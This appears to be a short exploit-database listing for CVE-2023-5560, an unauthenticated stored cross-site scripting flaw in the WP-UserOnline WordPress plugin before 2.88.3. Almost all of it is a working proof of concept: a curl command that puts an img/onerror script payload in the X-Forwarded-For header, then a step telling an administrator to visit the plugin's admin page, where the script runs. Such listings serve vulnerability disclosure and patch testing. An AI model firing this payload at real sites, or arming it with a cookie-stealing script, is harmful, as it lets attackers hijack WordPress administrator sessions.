Exploit for WP-UserOnline < 2.88.3 - Unauthenticated Stored XSS CVE-2023-5560

Name: Exploit for WP-UserOnline < 2.88.3 - Unauthenticated Stored XSS CVE-2023-5560
Rating: 5 (8 reviews)

2023-11-06 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:55D23184-FC5A-4090-B079-142407B59B05
curl https://example.com -H 'X-Forwarded-For: <img src=x onerror=alert(/xss/)>'

Then, as a high-privileged user, visit `/wp-admin/index.php?page=useronline`